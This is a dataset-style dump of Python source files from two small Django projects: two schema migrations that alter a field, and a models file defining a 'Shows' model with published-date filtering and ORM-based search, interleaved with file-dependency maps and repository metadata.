{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,523
|
adwalkz/DjangoDataAnalysis
|
refs/heads/main
|
/ts/migrations/0009_auto_20210625_1208.py
|
# Generated by Django 3.1 on 2021-06-25 12:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('ts', '0008_surveyquestion_surveyquestionchoice'),
]
operations = [
migrations.AlterField(
model_name='surveyquestion',
name='ques_id',
field=models.AutoField(primary_key=True, serialize=False),
),
]
|
{"/client/models.py": ["/ts/models.py"], "/ts/views.py": ["/ts/models.py"], "/ts/admin.py": ["/ts/models.py"], "/client/admin.py": ["/client/models.py"], "/client/views.py": ["/ts/models.py", "/client/models.py"]}
|
34,524
|
yhtps237/ostendit
|
refs/heads/master
|
/shows/migrations/0006_auto_20200527_0939.py
|
# Generated by Django 2.2.1 on 2020-05-27 05:39
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('shows', '0005_auto_20200525_1600'),
]
operations = [
migrations.AlterField(
model_name='shows',
name='title',
field=models.CharField(max_length=200),
),
]
|
{"/shows/views.py": ["/shows/models.py", "/shows/forms.py", "/comments/models.py", "/comments/forms.py"], "/pages/views.py": ["/shows/models.py"], "/shows/forms.py": ["/shows/models.py"], "/shows/urls.py": ["/shows/views.py"], "/user/views.py": ["/shows/models.py"], "/shows/admin.py": ["/shows/models.py"], "/user/urls.py": ["/user/views.py"], "/comments/forms.py": ["/comments/models.py"]}
|
34,525
|
yhtps237/ostendit
|
refs/heads/master
|
/shows/models.py
|
from django.db import models
from django.conf import settings
from django.utils import timezone
from django.db.models import Q
# Create your models here.
User = settings.AUTH_USER_MODEL
class ShowsGetQuerySet(models.QuerySet):
def published(self):
now = timezone.now()
return self.filter(published__lte=now)
def search(self, q):
lookup = (
Q(title__icontains=q) |
Q(slug__icontains=q) |
Q(content__icontains=q) |
Q(user__username__icontains=q) |
Q(user__first_name__icontains=q) |
Q(user__last_name__icontains=q))
return self.filter(lookup)
class ShowsManager(models.Manager):
def get_queryset(self):
return ShowsGetQuerySet(self.model, using=self._db)
def published(self):
return self.get_queryset().published()
def search(self, q):
if q is None:
return self.get_queryset().none()
return self.get_queryset().published().search(q)
class Shows(models.Model):
user = models.ForeignKey(
User, on_delete=models.SET_NULL, default=1, blank=True, null=True)
title = models.CharField(max_length=200)
slug = models.SlugField(unique=False)
image = models.ImageField(upload_to='image/', blank=True)
content = models.TextField(blank=True)
animation = models.BooleanField()
published = models.DateTimeField(
auto_now=False, auto_now_add=False, blank=True, null=True)
timestamp = models.DateTimeField(auto_now_add=True)
updated = models.DateTimeField(auto_now=True)
objects = ShowsManager()
class Meta:
ordering = ['-published', '-timestamp', '-updated']
def get_absolute_url(self):
return f'/shows/{self.user}/{self.slug}/'
def get_update_url(self):
return f'{self.get_absolute_url()}edit/'
def get_delete_url(self):
return f'{self.get_absolute_url()}delete/'
def __str__(self):
return f'{self.user} | {self.title}'
|
{"/shows/views.py": ["/shows/models.py", "/shows/forms.py", "/comments/models.py", "/comments/forms.py"], "/pages/views.py": ["/shows/models.py"], "/shows/forms.py": ["/shows/models.py"], "/shows/urls.py": ["/shows/views.py"], "/user/views.py": ["/shows/models.py"], "/shows/admin.py": ["/shows/models.py"], "/user/urls.py": ["/user/views.py"], "/comments/forms.py": ["/comments/models.py"]}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.